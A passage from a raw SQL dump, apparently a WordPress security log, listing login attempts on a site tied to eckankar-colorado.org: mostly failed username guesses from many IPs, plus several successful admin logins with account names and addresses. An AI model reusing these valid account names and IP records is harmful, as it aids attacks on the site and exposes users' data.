Safari/537.36'),(18837,112921,1692579929.130915,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF67FA45CA,'Mozilla/5.0 (Linux; Android 11; SM-A515U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18838,112922,1692579930.617846,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFC0D28950,'Mozilla/5.0 (Linux; Android 7.0; LGL64VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 Mobile Safari/537.36'),(18839,112923,1692579942.954448,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF770F53EE,'Mozilla/5.0 (Linux; Android 12; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18840,112924,1692579945.366194,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF2BE6C07F,'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'),(18841,112978,1692619481.331103,1,'loginFailInvalidUsername','mohamedzakarya159',0,0x00000000000000000000FFFF34B89679,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18806,112604,1692484131.483861,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF244754A4,'Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18807,112606,1692484134.583408,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFBE62C53A,'Mozilla/5.0 (Linux; Android 11; SM-A125U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36'),(18808,112607,1692484136.730181,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFC86CBE06,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1'),(18809,112660,1692520506.054215,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18810,112661,1692520506.837756,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18811,112662,1692520507.067132,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18754,111701,1692235517.492780,1,'loginFailInvalidUsername','support5',0,0x00000000000000000000FFFFBAFA71B3,'Mozilla/5.0 (Linux; Android 12; Pixel 4a (5G)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18755,111775,1692250463.547246,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB058AB79,'Mozilla/5.0 (Linux; Android 12; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18756,111776,1692250465.296141,1,'loginFailInvalidUsername','developer007',0,0x00000000000000000000FFFF453C7471,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18757,111777,1692250467.830518,1,'loginFailInvalidUsername','developer001',0,0x00000000000000000000FFFFCA3FC201,'Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18758,111778,1692250473.189928,1,'loginFailInvalidUsername','matt777',0,0x00000000000000000000FFFFDCB3F144,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43'),(18759,111779,1692250476.231173,1,'loginFailInvalidUsername','support1',0,0x00000000000000000000FFFF08DA5494,'Mozilla/5.0 (Linux; Android 11; LM-G900) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18760,111780,1692250477.746276,1,'loginFailInvalidUsername','support2',0,0x00000000000000000000FFFFB2FEDADA,'Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.34 Mobile Safari/537.36'),(18761,111781,1692250479.898676,1,'loginFailInvalidUsername','support3',0,0x00000000000000000000FFFFB321D381,'Mozilla/5.0 (Linux; Android 11; SM-S515DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18762,111782,1692250482.790432,1,'loginFailInvalidUsername','support4',0,0x00000000000000000000FFFF6774F751,'Mozilla/5.0 (Linux; Android 9; Moto Z (2)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18714,111614,1692155976.173508,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFB1C85B7E,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975W) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/15.0 Chrome/90.0.4430.210 Mobile Safari/537.36'),(18715,111615,1692155979.154580,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFDEFEA480,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36'),(18716,111616,1692155981.192663,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF6BAE0B96,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18717,111617,1692158696.428728,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18718,111618,1692158779.416005,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18719,111631,1692180006.367630,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF5BF1B025,'Mozilla/5.0 (Linux; Android 12; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36'),(18720,111632,1692180009.322456,1,'loginFailInvalidUsername','developer007',0,0x00000000000000000000FFFF41149666,'Mozilla/5.0 (Linux; Android 11; LM-V450) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18721,111633,1692180012.101781,1,'loginFailInvalidUsername','developer001',0,0x00000000000000000000FFFFC59B45D6,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18722,111634,1692180014.049944,1,'loginFailInvalidUsername','matt777',0,0x00000000000000000000FFFF176F475C,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/40.2  Mobile/15E148 Safari/605.1.15'),(18723,111635,1692180016.742897,1,'loginFailInvalidUsername','support1',0,0x00000000000000000000FFFFDEFC11F3,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.43'),(18724,111636,1692180020.252041,1,'loginFailInvalidUsername','support3',0,0x00000000000000000000FFFFC8C3A0B2,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1'),(18725,111637,1692180022.361743,1,'loginFailInvalidUsername','support4',0,0x00000000000000000000FFFF5C578E8E,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1'),(18726,111638,1692180026.334111,1,'loginFailInvalidUsername','support5',0,0x00000000000000000000FFFF2DBAF2E7,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'),(18626,111289,1691982814.337797,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF0EE09C29,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'),(18625,111288,1691982812.260765,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF2FF0A2BA,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18627,111290,1691982817.351404,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFC08C66A2,'Mozilla/5.0 (Linux; Android 11; motorola razr) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18559,110889,1691859846.666379,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFFB29784F4,'Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18560,110890,1691859851.951554,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF41148E0C,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.92 Mobile Safari/537.36'),(18561,110891,1691859853.913092,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFBAB364A6,'Mozilla/5.0 (Linux; Android 11; XQ-BQ62) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36'),(18562,110892,1691859856.560603,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB354AD5A,'Mozilla/5.0 (Linux; Android 11; moto g stylus (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18563,110893,1691859859.168379,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF6DE006FA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0'),(18564,110894,1691859862.060373,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF72070956,'Mozilla/5.0 (Linux; Android 9; KFTRWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/96.1.237 like Chrome/96.0.4664.128 Safari/537.36'),(18565,110895,1691859864.251526,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFBAE02006,'Mozilla/5.0 (Linux; Android 11; SM-G781W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18566,110896,1691865399.522618,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFC3749B53,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.84 Mobile/15E148 Safari/604.1'),(18567,110897,1691865435.933109,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFFB7EA2D22,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18568,110898,1691865438.701728,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF0EF18E79,'Mozilla/5.0 (Linux; Android 11; Nokia 5.4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18569,110899,1691865441.100298,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF691BB442,'Mozilla/5.0 (Linux; Android 11; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36'),(18570,110900,1691865442.505880,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18571,110901,1691865444.770647,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFFC88E62EC,'Mozilla/5.0 (Linux; Android 9; LG-H932) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18545,110829,1691789511.652049,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF75D88C74,'Mozilla/5.0 (Linux; Android 11; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18546,110830,1691789519.771654,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFFB90609AA,'Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36'),(18547,110831,1691789521.072897,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFFC16FBCB3,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Snapchat/11.60.0.35 (like Safari/8612.1.27.0.31, panda)'),(18548,110832,1691789523.553298,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF7C9C9870,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18549,110833,1691789526.266307,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF1FCA476F,'Mozilla/5.0 (Linux; Android 11; SM-N976B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18550,110834,1691789528.861645,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF6627BA54,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/40.2  Mobile/15E148 Safari/605.1.15'),(18543,110819,1691737872.216552,1,'loginFailInvalidUsername','itsme',0,0x00000000000000000000FFFFC75B4033,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18544,110820,1691737872.230453,1,'loginFailInvalidUsername','wordcamp',0,0x00000000000000000000FFFFC75B4033,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18577,110914,1691890626.857114,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFAB7143EE,'Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(18578,110915,1691890629.691538,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF743A4C3A,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18579,110916,1691892542.627772,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFCAA6CFC3,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18580,110917,1691892547.481354,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFFBAB36433,'Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18494,110450,1691632244.619350,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860BADB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18498,110723,1691675536.790723,1,'loginFailInvalidUsername','matakucing3',0,0x00000000000000000000FFFFC647E054,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18495,110451,1691633111.454471,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860BADB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18496,110721,1691675534.070370,1,'loginFailInvalidUsername','smngrs951',0,0x00000000000000000000FFFF94484502,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18497,110722,1691675534.107835,1,'loginFailInvalidUsername','matakucing3',0,0x00000000000000000000FFFF94484502,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18499,110724,1691675536.814294,1,'loginFailInvalidUsername','smngrs951',0,0x00000000000000000000FFFFC647E054,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18500,110725,1691675539.611487,1,'loginFailInvalidUsername','smngrs951',0,0x00000000000000000000FFFFA2F1E06E,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18501,110726,1691675539.637249,1,'loginFailInvalidUsername','matakucing3',0,0x00000000000000000000FFFFA2F1E06E,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18502,110727,1691675644.073936,1,'loginFailInvalidUsername','smngrs955',0,0x00000000000000000000FFFF67AA7AD0,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18551,110835,1691789530.420110,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFFD59BA0EF,'Mozilla/5.0 (Linux; Android 11; EC211002) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18552,110836,1691790035.945261,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFFB1F2825A,'Mozilla/5.0 (Linux; Android 11; SM-N981U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36 OPR/66.2.3445.62346'),(18530,110795,1691705415.497687,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18531,110797,1691706295.600987,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18532,110804,1691737571.110738,1,'loginFailInvalidUsername','wpenginesupport',0,0x00000000000000000000FFFFCBF51CBD,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18533,110805,1691737571.121772,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFFCBF51CBD,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18534,110806,1691737636.339752,1,'loginFailInvalidUsername','wpmanager',0,0x00000000000000000000FFFFBC2808E4,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18535,110807,1691737636.375396,1,'loginFailInvalidUsername','hostingadmin',0,0x00000000000000000000FFFFBC2808E4,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18536,110810,1691737786.495478,1,'loginFailInvalidUsername','woopayplug',0,0x00000000000000000000FFFF614AD168,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18537,110811,1691737786.525972,1,'loginFailInvalidUsername','1001010',0,0x00000000000000000000FFFF614AD168,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18538,110812,1691737791.536141,1,'loginFailInvalidUsername','1001010',0,0x00000000000000000000FFFF3FF78568,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18539,110813,1691737791.539481,1,'loginFailInvalidUsername','woopayplug',0,0x00000000000000000000FFFF3FF78568,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18540,110814,1691737817.999008,1,'loginFailInvalidUsername','woopayplug',0,0x00000000000000000000FFFF8B3B2759,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18541,110815,1691737818.071635,1,'loginFailInvalidUsername','1001010',0,0x00000000000000000000FFFF8B3B2759,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18542,110818,1691737872.150514,1,'loginFailInvalidUsername','WPADMIN',0,0x00000000000000000000FFFF335B13BE,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18553,110837,1691790042.731898,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF8F894070,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(18554,110838,1691790044.330765,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF32074212,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18524,110754,1691686286.965669,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF86C3EFC7,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.120 Safari/537.36'),(18525,110756,1691686295.299379,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF78EB895F,'Mozilla/5.0 (Linux; Android 10; LGL555DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18526,110757,1691686300.334847,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFFB5CC0EDA,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18527,110758,1691686302.088258,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFFBAB36498,'Mozilla/5.0 (Linux; Android 9; G8341) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36'),(18528,110759,1691688558.259543,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18529,110764,1691691709.372062,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18557,110841,1691790052.267753,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF6F5AB862,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18555,110839,1691790046.872720,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF74D494F4,'Mozilla/5.0 (Linux; Android 11; SM-A716U Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile Safari/537.36'),(18556,110840,1691790049.670188,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFBD547FF6,'Mozilla/5.0 (Linux; Android 12; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18522,110752,1691684708.236407,1,'loginFailInvalidUsername','itsme',0,0x00000000000000000000FFFFB99D51B4,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(18523,110753,1691686283.666530,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFB360B8FE,'Mozilla/5.0 (Linux; Android 11; SM-S515DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18574,110911,1691890619.052142,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF88E8D022,'Mozilla/5.0 (Linux; Android 11; SM-A125U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18575,110912,1691890620.633413,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFA2D2FA0A,'Mozilla/5.0 (Linux; Android 11; SM-A015A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18576,110913,1691890623.845301,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFC4D80BF7,'Mozilla/5.0 (Linux; Android 10; SM-G986U Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36'),(18572,110902,1691865447.863536,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFFB9B03B88,'Mozilla/5.0 (Linux; Android 10; SM-A115U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18558,110842,1691790054.040411,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFC0A2ED32,'Mozilla/5.0 (Linux; Android 11; SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18573,110910,1691890610.807294,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF2BFC1898,'Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.210 Mobile Safari/537.36'),(18628,111291,1691982818.808893,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF175E3E8D,'Mozilla/5.0 (Linux; Android 5.1.1; SM-G530R7 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(18629,111292,1691982821.074836,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF67C71280,'Mozilla/5.0 (Linux; Android 11; motorola edge 5G UW (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18630,111293,1691982822.497590,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF9DFE9AA4,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/187.0.410885375 Mobile/15E148 Safari/604.1'),(18631,111294,1691984385.804781,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18632,111295,1691985235.010001,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18633,111305,1691987296.574742,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF677900F2,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/196.0.423110124 Mobile/15E148 Safari/604.1'),(18634,111306,1691987302.823882,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFF7BB70B98,'Mozilla/5.0 (Linux; Android 11; motorola one 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18635,111307,1691987305.580971,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF78C0B8A6,'Mozilla/5.0 (Linux; Android 11; BE2025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18636,111308,1691987307.279234,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF6BAC00D9,'Mozilla/5.0 (Linux; Android 10; LM-Q730) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 